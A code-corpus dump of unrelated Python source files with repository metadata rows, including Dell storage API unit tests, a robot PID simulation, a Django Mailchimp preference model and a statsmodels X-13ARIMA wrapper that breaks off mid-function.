"methodName": "GetScUserPreferencesDefaults",
"error": "",
"started": True,
"userName": "",
"localizedError": "",
"returnValue": "https://localhost:3033/api/rest/"
"ApiConnection/AsyncTask/1418394170395",
"storageCenter": 0,
"errorState": "None",
"successful": False,
"stepMessage": "Running Method [Object: ScUserPreferences] "
"[Method: GetScUserPreferencesDefaults]",
"localizedStepMessage": "",
"warningList": [],
"totalSteps": 2,
"timeFinished": "1969-12-31T18:00:00-06:00",
"timeStarted": "2015-01-07T14:07:10-06:00",
"currentStep": 1,
"objectTypeName": "ScUserPreferences",
"objectType": "AsyncTask",
"instanceName": "1418394170395",
"instanceId": "1418394170395"}
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
RESPONSE_200 = response_ok
# Create a Response object with no content
response_nc = models.Response()
response_nc.status_code = 204
response_nc.reason = u'duplicate'
RESPONSE_204 = response_nc
# Create a Response object is a pure error.
response_bad = models.Response()
response_bad.status_code = 400
response_bad.reason = u'bad request'
RESPONSE_400 = response_bad
def setUp(self):
super(DellHttpClientTestCase, self).setUp()
self.host = 'localhost'
self.port = '3033'
self.user = 'johnnyuser'
self.password = 'password'
self.verify = False
self.apiversion = '3.1'
self.httpclient = dell_storagecenter_api.HttpClient(
self.host, self.port, self.user, self.password,
self.verify, self.apiversion)
def test_get_async_url(self):
url = self.httpclient._get_async_url(self.ASYNCTASK)
self.assertEqual('api/rest/ApiConnection/AsyncTask/1418394170395', url)
def test_get_async_url_no_id_on_url(self):
badTask = self.ASYNCTASK.copy()
badTask['returnValue'] = ('https://localhost:3033/api/rest/'
'ApiConnection/AsyncTask/')
url = self.httpclient._get_async_url(badTask)
self.assertEqual('api/rest/ApiConnection/AsyncTask/1418394170395', url)
def test_get_async_url_none(self):
self.assertRaises(AttributeError, self.httpclient._get_async_url, None)
def test_get_async_url_no_id(self):
badTask = self.ASYNCTASK.copy()
badTask['returnValue'] = ('https://localhost:3033/api/rest/'
'ApiConnection/AsyncTask/')
badTask['instanceId'] = ''
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._get_async_url, badTask)
def test_rest_ret(self):
rest_response = self.RESPONSE_200
response = self.httpclient._rest_ret(rest_response, False)
self.assertEqual(self.RESPONSE_200, response)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_wait_for_async_complete',
return_value=RESPONSE_200)
def test_rest_ret_async(self,
mock_wait_for_async_complete):
mock_rest_response = mock.MagicMock()
mock_rest_response.status_code = 202
response = self.httpclient._rest_ret(mock_rest_response, True)
self.assertEqual(self.RESPONSE_200, response)
self.assertTrue(mock_wait_for_async_complete.called)
def test_rest_ret_async_error(self):
mock_rest_response = mock.MagicMock()
mock_rest_response.status_code = 400
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._rest_ret, mock_rest_response, True)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_wait_for_async_complete(self,
mock_get):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_200, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_get_async_url',
return_value=None)
def test_wait_for_async_complete_bad_url(self,
mock_get_async_url):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertIsNone(ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_wait_for_async_complete_bad_result(self,
mock_get):
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_400, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_wait_for_async_complete_loop(self,
mock_get):
mock_response = mock.MagicMock()
mock_response.content = mock.MagicMock()
mock_response.json = mock.MagicMock()
mock_response.json.side_effect = [self.ASYNCTASK,
{'objectType': 'ScVol'}]
ret = self.httpclient._wait_for_async_complete(self.ASYNCTASK)
self.assertEqual(self.RESPONSE_200, ret)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get')
def test_wait_for_async_complete_get_raises(self,
mock_get):
mock_get.side_effect = (exception.DellDriverRetryableException())
self.assertRaises(exception.VolumeBackendAPIException,
self.httpclient._wait_for_async_complete,
self.ASYNCTASK)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_rest_ret',
return_value=RESPONSE_200)
@mock.patch.object(requests.Session,
'get',
return_value=RESPONSE_200)
def test_get(self,
mock_get,
mock_rest_ret):
ret = self.httpclient.get('url', False)
self.assertEqual(self.RESPONSE_200, ret)
mock_rest_ret.assert_called_once_with(self.RESPONSE_200, False)
expected_headers = self.httpclient.header.copy()
mock_get.assert_called_once_with('https://localhost:3033/api/rest/url',
headers=expected_headers,
verify=False)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'_rest_ret',
return_value=RESPONSE_200)
@mock.patch.object(requests.Session,
'get',
return_value=RESPONSE_200)
def test_get_async(self,
mock_get,
mock_rest_ret):
ret = self.httpclient.get('url', True)
self.assertEqual(self.RESPONSE_200, ret)
mock_rest_ret.assert_called_once_with(self.RESPONSE_200, True)
expected_headers = self.httpclient.header.copy()
expected_headers['async'] = True
mock_get.assert_called_once_with('https://localhost:3033/api/rest/url',
headers=expected_headers,
verify=False)
class DellStorageCenterApiHelperTestCase(test.TestCase):
"""DellStorageCenterApiHelper test case
Class to test the Storage Center API helper using Mock.
"""
def setUp(self):
super(DellStorageCenterApiHelperTestCase, self).setUp()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(12345, ret.ssn)
self.assertEqual('FibreChannel', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection_iscsi(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'iSCSI')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(12345, ret.ssn)
self.assertEqual('Iscsi', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'open_connection')
def test_setup_connection_failover(self,
mock_open_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.dell_sc_volume_folder = 'a'
config.dell_sc_server_folder = 'a'
config.dell_sc_verify_cert = False
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, '67890',
'iSCSI')
ret = helper._setup_connection()
self.assertEqual(12345, ret.primaryssn)
self.assertEqual(67890, ret.ssn)
self.assertEqual('Iscsi', ret.protocol)
mock_open_connection.assert_called_once_with()
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.return_value = mock_connection
ret = helper.open_connection()
self.assertEqual('3.1', ret.apiversion)
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_fail_no_secondary(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = ''
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_setup_connection.side_effect = (
exception.VolumeBackendAPIException('abc'))
self.assertRaises(exception.VolumeBackendAPIException,
helper.open_connection)
mock_setup_connection.assert_called_once_with()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_secondary(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = 'password2'
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.side_effect = [
(exception.VolumeBackendAPIException('abc')), mock_connection]
ret = helper.open_connection()
self.assertEqual('3.1', ret.apiversion)
self.assertEqual(2, mock_setup_connection.call_count)
self.assertEqual('192.168.0.102', helper.san_ip)
self.assertEqual('username2', helper.san_login)
self.assertEqual('password2', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_fail_partial_secondary_config(
self, mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = ''
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_setup_connection.side_effect = (
exception.VolumeBackendAPIException('abc'))
self.assertRaises(exception.VolumeBackendAPIException,
helper.open_connection)
mock_setup_connection.assert_called_once_with()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
@mock.patch.object(dell_storagecenter_api.StorageCenterApiHelper,
'_setup_connection')
def test_open_connection_to_secondary_and_back(self,
mock_setup_connection):
config = mock.MagicMock()
config.dell_sc_ssn = 12345
config.san_ip = '192.168.0.101'
config.san_login = 'username'
config.san_password = 'password'
config.san_port = 3033
config.secondary_san_ip = '192.168.0.102'
config.secondary_san_login = 'username2'
config.secondary_san_password = 'password2'
helper = dell_storagecenter_api.StorageCenterApiHelper(config, None,
'FC')
mock_connection = mock.MagicMock()
mock_connection.apiversion = '3.1'
mock_setup_connection.side_effect = [
(exception.VolumeBackendAPIException('abc')), mock_connection,
(exception.VolumeBackendAPIException('abc')), mock_connection]
helper.open_connection()
self.assertEqual('192.168.0.102', helper.san_ip)
self.assertEqual('username2', helper.san_login)
self.assertEqual('password2', helper.san_password)
self.assertEqual(2, mock_setup_connection.call_count)
helper.open_connection()
self.assertEqual('192.168.0.101', helper.san_ip)
self.assertEqual('username', helper.san_login)
self.assertEqual('password', helper.san_password)
| 47.487374 | 79 | 0.516733 | [
"Apache-2.0"
] | bswartz/cinder | cinder/tests/unit/test_dellscapi.py | 344,141 | Python |
from vec2d_jdm import Vec2D
import math
class Robot(object):
ROBOT_WIDTH = 10
ROBOT_HEIGHT = 15
ROBOT_EDGE = 2
TRAJ_THICKNESS = 4
def __init__(self, speed, canvaswidth, canvasheight, path,
color = "blue", trajColor = "red"):
self.canvaswidth = canvaswidth
self.canvasheight = canvasheight
self.speed = speed
self.height = Robot.ROBOT_HEIGHT
self.v = Vec2D(0, speed)
# Origin is actually at the center top of the
self.pos = Vec2D(0, 0)
self.t = 0
self.color = color
self.trajColor = trajColor
self.path = path
self.trajectory = []
def update(self):
self.t += 1
self.pos += self.v
self.trajectory.append(self.pos)
self.correctError()
# This is where different algorithms differ
def correctError(self):
pass
def draw(self, canvas):
self.drawTrajectory(canvas)
self.drawRobot(canvas)
def drawTrajectory(self, canvas):
for point in self.trajectory:
x = point.x
y = point.y
canvas.create_oval(x + self.canvaswidth / 2
- Robot.TRAJ_THICKNESS / 2,
y - Robot.TRAJ_THICKNESS / 2,
x + self.canvaswidth / 2
+ Robot.TRAJ_THICKNESS / 2,
y + Path.THICKNESS / 2,
fill = self.trajColor, width = 0)
def drawRobot(self, canvas):
angle = self.v.get_angle()
# The side of the robot that's perpendicular to its velocity
perpSide = Vec2D(Robot.ROBOT_WIDTH,0)
perpSide = perpSide.set_angle(angle - 90)
# The parallel side
paraSide = Vec2D(Robot.ROBOT_HEIGHT,0)
paraSide = paraSide.set_angle(angle)
# The bottom edge
(x0, y0) = (round((self.pos - perpSide * 0.5).x),
round((self.pos - perpSide * 0.5).y))
(x1, y1) = (round((self.pos + perpSide * 0.5).x),
round((self.pos + perpSide * 0.5).y))
canvas.create_line(x0 + self.canvaswidth / 2, y0,
x1 + self.canvaswidth / 2, y1, width = Robot.ROBOT_EDGE,
fill = self.color)
# The left edge
x2 = x0 + round(paraSide.x)
y2 = y0 + round(paraSide.y)
canvas.create_line(x0 + self.canvaswidth / 2, y0,
x2 + self.canvaswidth / 2, y2, width = Robot.ROBOT_EDGE,
fill = self.color)
# The right edge
x3 = x1 + round(paraSide.x)
y3 = y1 + round(paraSide.y)
canvas.create_line(x1 + self.canvaswidth / 2, y1,
x3 + self.canvaswidth / 2, y3, width = Robot.ROBOT_EDGE,
fill = self.color)
# The top edge
canvas.create_line(x2 + self.canvaswidth / 2, y2,
x3 + self.canvaswidth / 2, y3, width = Robot.ROBOT_EDGE,
fill = self.color)
class Robot_PID(Robot):
def __init__(self,speed, canvaswidth, canvasheight, path,
P, I, D, color = "blue"):
super().__init__( speed, canvaswidth, canvasheight, path, color)
self.P = P
self.I = I
self.D = D
self.lastErr = 0
self.totalErr = 0
def correctError(self):
front = self.pos + self.v.normal() * self.height
closestPoint = self.path.closestPoint(front)
errorVec = closestPoint - self.pos
error = errorVec.length()
# Determine the sign of the error
# + if path on the left, - if on the right
theta = self.v.get_angle_between(errorVec)
if theta < 0:
error *= -1
self.totalErr += error
derivative = error - self.lastErr
self.lastErr = error
correction = (self.P * error +
self.I * self.totalErr +
self.D * derivative)
self.v.rotated(correction, True)
class Robot_intelligent(Robot):
pass
class Path(object):
THICKNESS = 2
def __init__(self, f, canvaswidth, canvasheight,
color = "black", resolution = 500):
self.resolution = resolution
self.path = f
self.height = canvasheight
self.width = canvaswidth
self.color = color
def getPoint(self, t):
return self.path(t)
def closestPoint(self, pos):
minDistance = None
for i in range(self.resolution):
t = i / self.resolution # t in [0, 1)
point = self.getPoint(t)
d = ((pos.x - point.x)**2 + (pos.y - point.y)**2)**0.5
if minDistance == None or d < minDistance:
minDistance = d
result = point
return result
def draw(self, canvas):
for i in range(self.resolution):
t = i / self.resolution # t in [0, 1)
point = self.getPoint(t)
x = point.x
y = point.y
canvas.create_oval(x + self.width / 2 - Path.THICKNESS / 2,
y - Path.THICKNESS / 2,
x + self.width / 2 + Path.THICKNESS / 2,
y + Path.THICKNESS / 2,
fill = self.color)
| 33.916129 | 72 | 0.531101 | [
"Apache-2.0"
] | harveybia/the-flash-sudo | Mobot_simulation/Robot.py | 5,257 | Python |
#!/usr/bin/env python
def main():
print("test script")
if __name__ == '__main__':
main() | 12.375 | 26 | 0.59596 | [
"MIT"
] | sdementen/gnucash-utilities | scripts/gc_test.py | 99 | Python |
import pomdp_py
class Observation(pomdp_py.Observation):
"""Defines the Observation for the continuous light-dark domain;
Observation space:
:math:`\Omega\subseteq\mathbb{R}^2` the observation of the robot is
an estimate of the robot position :math:`g(x_t)\in\Omega`.
"""
# the number of decimals to round up an observation when it is discrete.
PRECISION=2
def __init__(self, position, discrete=False):
"""
Initializes a observation in light dark domain.
Args:
position (tuple): position of the robot.
"""
self._discrete = discrete
if len(position) != 2:
raise ValueError("Observation position must be a vector of length 2")
if self._discrete:
self.position = position
else:
self.position = (round(position[0], Observation.PRECISION),
round(position[1], Observation.PRECISION))
def discretize(self):
return Observation(self.position, discrete=True)
def __hash__(self):
return hash(self.position)
def __eq__(self, other):
if isinstance(other, Observation):
return self.position == other.position
else:
return False
def __str__(self):
return self.__repr__()
def __repr__(self):
return "Observation(%s)" % (str(self.position))
| 29.854167 | 81 | 0.604327 | [
"MIT"
] | Deathn0t/pomdp-py | pomdp_problems/light_dark/domain/observation.py | 1,433 | Python |
from ermaket.api.scripts import ReturnContext, UserScript
__all__ = ['script']
script = UserScript(id=2)
@script.register
def no_way(context):
return ReturnContext(abort=418, abort_msg="I am a teapot")
| 19.090909 | 62 | 0.752381 | [
"Apache-2.0"
] | SqrtMinusOne/ERMaket | ermaket/tests/dummy_scripts/script_abort.py | 210 | Python |
from django.conf import settings
from django.db import models
from django.db.models.signals import post_save, pre_save
from .utils import Mailchimp
class MarketingPreference(models.Model):
user = models.OneToOneField(settings.AUTH_USER_MODEL)
subscribed = models.BooleanField(default=True)
mailchimp_subscribed = models.NullBooleanField(blank=True)
mailchimp_msg = models.TextField(null=True, blank=True)
timestamp = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
def __str__(self):
return self.user.email
def marketing_pref_create_receiver(sender, instance, created, *args, **kwargs):
if created:
status_code, response_data = Mailchimp().subscribe(instance.user.email)
print(status_code, response_data)
post_save.connect(marketing_pref_create_receiver, sender=MarketingPreference)
def marketing_pref_update_receiver(sender, instance, *args, **kwargs):
if instance.subscribed != instance.mailchimp_subscribed:
if instance.subscribed:
# subscribing user
status_code, response_data = Mailchimp().subscribe(instance.user.email)
else:
# unsubscribing user
status_code, response_data = Mailchimp().unsubscribe(instance.user.email)
if response_data['status'] == 'subscribed':
instance.subscribed = True
instance.mailchimp_subscribed = True
instance.mailchimp_msg = response_data
else:
instance.subscribed = False
instance.mailchimp_subscribed = False
instance.mailchimp_msg = response_data
pre_save.connect(marketing_pref_update_receiver, sender=MarketingPreference)
def make_marketing_pref_receiver(sender, instance, created, *args, **kwargs):
'''
User model
'''
if created:
MarketingPreference.objects.get_or_create(user=instance)
post_save.connect(make_marketing_pref_receiver, sender=settings.AUTH_USER_MODEL)
| 33.903226 | 85 | 0.692198 | [
"MIT"
] | felipebrigo/Python-Projects | eCommerce-master/src/marketing/models.py | 2,102 | Python |
"""
Run x12/x13-arima specs in a subprocess from Python and curry results back
into python.
Notes
-----
Many of the functions are called x12. However, they are also intended to work
for x13. If this is not the case, it's a bug.
"""
import os
import subprocess
import tempfile
import re
from warnings import warn
import pandas as pd
from statsmodels.compat.python import iteritems
from statsmodels.tools.tools import Bunch
from statsmodels.tools.sm_exceptions import (X13NotFoundError,
IOWarning, X13Error,
X13Warning)
__all__ = ["x13_arima_select_order", "x13_arima_analysis"]
_binary_names = ('x13as.exe', 'x13as', 'x12a.exe', 'x12a')
class _freq_to_period:
def __getitem__(self, key):
if key.startswith('M'):
return 12
elif key.startswith('Q'):
return 4
elif key.startswith('W'):
return 52
_freq_to_period = _freq_to_period()
_period_to_freq = {12: 'M', 4: 'Q'}
_log_to_x12 = {True: 'log', False: 'none', None: 'auto'}
_bool_to_yes_no = lambda x: 'yes' if x else 'no' # noqa:E731
def _find_x12(x12path=None, prefer_x13=True):
"""
If x12path is not given, then either x13as[.exe] or x12a[.exe] must
be found on the PATH. Otherwise, the environmental variable X12PATH or
X13PATH must be defined. If prefer_x13 is True, only X13PATH is searched
for. If it is false, only X12PATH is searched for.
"""
global _binary_names
if x12path is not None and x12path.endswith(_binary_names):
# remove binary from path if given
x12path = os.path.dirname(x12path)
if not prefer_x13: # search for x12 first
_binary_names = _binary_names[::-1]
if x12path is None:
x12path = os.getenv("X12PATH", "")
if not x12path:
x12path = os.getenv("X13PATH", "")
elif x12path is None:
x12path = os.getenv("X13PATH", "")
if not x12path:
x12path = os.getenv("X12PATH", "")
for binary in _binary_names:
x12 = os.path.join(x12path, binary)
try:
subprocess.check_call(x12, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
return x12
except OSError:
pass
else:
return False
def _check_x12(x12path=None):
x12path = _find_x12(x12path)
if not x12path:
raise X13NotFoundError("x12a and x13as not found on path. Give the "
"path, put them on PATH, or set the "
"X12PATH or X13PATH environmental variable.")
return x12path
def _clean_order(order):
"""
Takes something like (1 1 0)(0 1 1) and returns a arma order, sarma
order tuple. Also accepts (1 1 0) and return arma order and (0, 0, 0)
"""
order = re.findall(r"\([0-9 ]*?\)", order)
def clean(x):
return tuple(map(int, re.sub("[()]", "", x).split(" ")))
if len(order) > 1:
order, sorder = map(clean, order)
else:
order = clean(order[0])
sorder = (0, 0, 0)
return order, sorder
def run_spec(x12path, specpath, outname=None, meta=False, datameta=False):
if meta and datameta:
raise ValueError("Cannot specify both meta and datameta.")
if meta:
args = [x12path, "-m " + specpath]
elif datameta:
args = [x12path, "-d " + specpath]
else:
args = [x12path, specpath]
if outname:
args += [outname]
return subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def _make_automdl_options(maxorder, maxdiff, diff):
options = "\n"
options += "maxorder = ({0} {1})\n".format(maxorder[0], maxorder[1])
if maxdiff is not None: # maxdiff always takes precedence
options += "maxdiff = ({0} {1})\n".format(maxdiff[0], maxdiff[1])
else:
options += "diff = ({0} {1})\n".format(diff[0], diff[1])
return options
def _make_var_names(exog):
if hasattr(exog, "name"):
var_names = exog.name
elif hasattr(exog, "columns"):
var_names = exog.columns
else:
raise ValueError("exog is not a Series or DataFrame or is unnamed.")
try:
var_names = " ".join(var_names)
except TypeError: # cannot have names that are numbers, pandas default
from statsmodels.base.data import _make_exog_names
if exog.ndim == 1:
var_names = "x1"
else:
var_names = " ".join(_make_exog_names(exog))
return var_names
def _make_regression_options(trading, exog):
if not trading and exog is None: # start regression spec
return ""
reg_spec = "regression{\n"
if trading:
reg_spec += " variables = (td)\n"
if exog is not None:
var_names = _make_var_names(exog)
reg_spec += " user = ({0})\n".format(var_names)
reg_spec += " data = ({0})\n".format("\n".join(map(str,
exog.values.ravel().tolist())))
reg_spec += "}\n" # close out regression spec
return reg_spec
def _make_forecast_options(forecast_years):
if forecast_years is None:
return ""
forecast_spec = "forecast{\n"
forecast_spec += "maxlead = ({0})\n}}\n".format(forecast_years)
return forecast_spec
def _check_errors(errors):
errors = errors[errors.find("spc:")+4:].strip()
if errors and 'ERROR' in errors:
raise X13Error(errors)
elif errors and 'WARNING' in errors:
warn(errors, X13Warning)
def _convert_out_to_series(x, dates, name):
"""
Convert x to a DataFrame where x is a string in the format given by
x-13arima-seats output.
"""
from io import StringIO
from pandas import read_csv
out = read_csv(StringIO(x), skiprows=2,
header=None, sep='\t', engine='python')
return out.set_index(dates).rename(columns={1: name})[name]
def _open_and_read(fname):
# opens a file, reads it, and make sure it's closed
with open(fname, 'r') as fin:
fout = fin.read()
return fout
class Spec(object):
@property
def spec_name(self):
return self.__class__.__name__.replace("Spec", "")
def create_spec(self, **kwargs):
spec = """{name} {{
{options}
}}
"""
return spec.format(name=self.spec_name,
options=self.options)
def set_options(self, **kwargs):
options = ""
for key, value in iteritems(kwargs):
options += "{0}={1}\n".format(key, value)
self.__dict__.update({key: value})
self.options = options
class SeriesSpec(Spec):
"""
Parameters
----------
data
appendbcst : bool
appendfcst : bool
comptype
compwt
decimals
modelspan
name
period
precision
to_print
to_save
span
start
title
type
Notes
-----
Rarely used arguments
divpower
missingcode
missingval
saveprecision
trimzero
"""
def __init__(self, data, name='Unnamed Series', appendbcst=False,
appendfcst=False,
comptype=None, compwt=1, decimals=0, modelspan=(),
period=12, precision=0, to_print=[], to_save=[], span=(),
start=(1, 1), title='', series_type=None, divpower=None,
missingcode=-99999, missingval=1000000000):
appendbcst, appendfcst = map(_bool_to_yes_no, [appendbcst,
appendfcst,
])
series_name = "\"{0}\"".format(name[:64]) # trim to 64 characters
title = "\"{0}\"".format(title[:79]) # trim to 79 characters
self.set_options(data=data, appendbcst=appendbcst,
appendfcst=appendfcst, period=period, start=start,
title=title, name=series_name,
)
def pandas_to_series_spec(x):
# from statsmodels.tools.data import _check_period_index
# check_period_index(x)
if hasattr(x, 'columns'): # convert to series
if len(x.columns) > 1:
raise ValueError("Does not handle DataFrame with more than one "
"column")
x = x[x.columns[0]]
data = "({0})".format("\n".join(map(str, x.values.tolist())))
# get periodicity
# get start / first data
# give it a title
try:
period = _freq_to_period[x.index.freqstr]
except (AttributeError, ValueError):
from pandas.tseries.api import infer_freq
period = _freq_to_period[infer_freq(x.index)]
start_date = x.index[0]
if period == 12:
year, stperiod = start_date.year, start_date.month
elif period == 4:
year, stperiod = start_date.year, start_date.quarter
else: # pragma: no cover
raise ValueError("Only monthly and quarterly periods are supported."
" Please report or send a pull request if you want "
"this extended.")
if hasattr(x, 'name'):
name = x.name or "Unnamed Series"
else:
name = 'Unnamed Series'
series_spec = SeriesSpec(data=data, name=name, period=period,
title=name, start="{0}.{1}".format(year,
stperiod))
return series_spec
def x13_arima_analysis(endog, maxorder=(2, 1), maxdiff=(2, 1), diff=None,
exog=None, log=None, outlier=True, trading=False,
forecast_years=None, retspec=False,
speconly=False, start=None, freq=None,
print_stdout=False, x12path=None, prefer_x13=True):
"""
Perform x13-arima analysis for monthly or quarterly data.
Parameters
----------
endog : array_like, pandas.Series
The series to model. It is best to use a pandas object with a
DatetimeIndex or PeriodIndex. However, you can pass an array-like
object. If your object does not have a dates index then ``start`` and
``freq`` are not optional.
maxorder : tuple
The maximum order of the regular and seasonal ARMA polynomials to
examine during the model identification. The order for the regular
polynomial must be greater than zero and no larger than 4. The
order for the seasonal polynomial may be 1 or 2.
maxdiff : tuple
The maximum orders for regular and seasonal differencing in the
automatic differencing procedure. Acceptable inputs for regular
differencing are 1 and 2. The maximum order for seasonal differencing
is 1. If ``diff`` is specified then ``maxdiff`` should be None.
Otherwise, ``diff`` will be ignored. See also ``diff``.
diff : tuple
Fixes the orders of differencing for the regular and seasonal
differencing. Regular differencing may be 0, 1, or 2. Seasonal
differencing may be 0 or 1. ``maxdiff`` must be None, otherwise
``diff`` is ignored.
exog : array_like
Exogenous variables.
log : bool or None
If None, it is automatically determined whether to log the series or
not. If False, logs are not taken. If True, logs are taken.
outlier : bool
Whether or not outliers are tested for and corrected, if detected.
trading : bool
Whether or not trading day effects are tested for.
forecast_years : int
Number of forecasts produced. The default is one year.
retspec : bool
Whether to return the created specification file. Can be useful for
debugging.
speconly : bool
Whether to create the specification file and then return it without
performing the analysis. Can be useful for debugging.
start : str, datetime
Must be given if ``endog`` does not have date information in its index.
Anything accepted by pandas.DatetimeIndex for the start value.
freq : str
Must be givein if ``endog`` does not have date information in its
index. Anything accepted by pandas.DatetimeIndex for the freq value.
print_stdout : bool
The stdout from X12/X13 is suppressed. To print it out, set this
to True. Default is False.
x12path : str or None
The path to x12 or x13 binary. If None, the program will attempt
to find x13as or x12a on the PATH or by looking at X13PATH or
X12PATH depending on the value of prefer_x13.
prefer_x13 : bool
If True, will look for x13as first and will fallback to the X13PATH
environmental variable. If False, will look for x12a first and will
fallback to the X12PATH environmental variable. If x12path points
to the path for the X12/X13 binary, it does nothing.
Returns
-------
res : Bunch
A bunch object with the following attributes:
- results : str
The full output from the X12/X13 run.
- seasadj : pandas.Series
The final seasonally adjusted ``endog``
- trend : pandas.Series
The trend-cycle component of ``endog``
- irregular : pandas.Series
The final irregular component of ``endog``
- stdout : str
The captured stdout produced by x12/x13.
- spec : str, optional
Returned if ``retspec`` is True. The only thing returned if
``speconly`` is True.
Notes
-----
This works by creating a specification file, writing it to a temporary
directory, invoking X12/X13 in a subprocess, and reading the output
directory, invoking exog12/X13 in a subprocess, and reading the output
back in.
"""
x12path = _check_x12(x12path)
if not isinstance(endog, (pd.DataFrame, pd.Series)):
if start is None or freq is None:
raise ValueError("start and freq cannot be none if endog is not "
"a pandas object")
endog = pd.Series(endog, index=pd.DatetimeIndex(start=start,
periods=len(endog),
freq=freq))
spec_obj = pandas_to_series_spec(endog)
spec = spec_obj.create_spec()
spec += "transform{{function={0}}}\n".format(_log_to_x12[log])
if outlier:
spec += "outlier{}\n"
options = _make_automdl_options(maxorder, maxdiff, diff)
spec += "automdl{{{0}}}\n".format(options)
spec += _make_regression_options(trading, exog)
spec += _make_forecast_options(forecast_years)
spec += "x11{ save=(d11 d12 d13) }"
if speconly:
return spec
# write it to a tempfile
# TODO: make this more robust - give the user some control?
ftempin = tempfile.NamedTemporaryFile(delete=False, suffix='.spc')
ftempout = tempfile.NamedTemporaryFile(delete=False)
try:
ftempin.write(spec.encode('utf8'))
ftempin.close()
ftempout.close()
# call x12 arima
p = run_spec(x12path, ftempin.name[:-4], ftempout.name)
p.wait()
stdout = p.stdout.read()
if print_stdout:
print(p.stdout.read())
# check for errors
errors = _open_and_read(ftempout.name + '.err')
_check_errors(errors)
# read in results
results = _open_and_read(ftempout.name + '.out')
seasadj = _open_and_read(ftempout.name + '.d11')
trend = _open_and_read(ftempout.name + '.d12')
irregular = _open_and_read(ftempout.name + '.d13')
finally:
try: # sometimes this gives a permission denied error?
# not sure why. no process should have these open
os.remove(ftempin.name)
os.remove(ftempout.name)
except OSError:
if os.path.exists(ftempin.name):
warn("Failed to delete resource {0}".format(ftempin.name),
IOWarning)
if os.path.exists(ftempout.name):
warn("Failed to delete resource {0}".format(ftempout.name),
IOWarning)
seasadj = _convert_out_to_series(seasadj, endog.index, 'seasadj')
trend = _convert_out_to_series(trend, endog.index, 'trend')
irregular = _convert_out_to_series(irregular, endog.index, 'irregular')
